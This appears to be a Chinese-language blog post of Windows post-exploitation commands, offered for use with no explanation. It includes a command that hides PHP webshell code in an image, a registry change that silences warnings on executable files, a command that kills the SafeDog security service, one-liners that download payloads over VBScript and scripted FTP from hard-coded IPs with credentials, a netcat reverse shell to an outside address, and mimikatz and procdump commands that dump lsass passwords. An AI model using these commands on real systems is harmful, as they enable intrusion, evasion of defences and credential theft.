windows.txt

1:合成shell
copy xx.png /b +think.php /a 1.jpg

2:取消共享文件夹安全警告
@echo off
Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f

3:搞死安全狗 3.x
ntsd -c q -pn SafeDogGuardCenter.exe
4:命令行ftp一句话下载
cd c:\temp\ && echo set xPost = createObject("Microsoft.XMLHTTP") > 1.vbs && echo xPost.Open "GET","http://23.92.17.103/scripts/x",0 >> 1.vbs && echo xPost.Send() >> 1.vbs && echo Set sGet = createObject("ADODB.Stream") >> 1.vbs && (echo sGet.Mode = 3) >> 1.vbs && (echo sGet.Type = 1) >> 1.vbs && echo sGet.Open() >> 1.vbs && echo sGet.Write(xPost.responseBody) >> 1.vbs && echo sGet.SaveToFile "x" >> 1.vbs && cscript 1.vbs
(echo open 123.242.230.24)> c:/temp/1.txt && (echo tonysir)>>c:/temp/1.txt && (echo 5Zk3Kcmv)>>c:/temp/1.txt && (echo type binary) >> c:/temp/1.txt && echo get 1.exe >> c:/temp/1.txt && echo bye >> c:/temp/1.txt && ftp -s:c:/temp/1.txt && dir c:\temp
5:nc 反弹
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779

6:rar 压缩
rar a -r d:/d.rar d:/test ( -r 子目录)

7:NC
nc -v -L -p 443
nc -nvv 127.0.0.1 200
nc -t -e cmd.exe 192.168.1.102 2012
nc -nvv 127.0.0.1 443

8:mimikatz
@echo off
cd %~dp0
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
pause

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

9:dir

dir /s

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码
添加新评论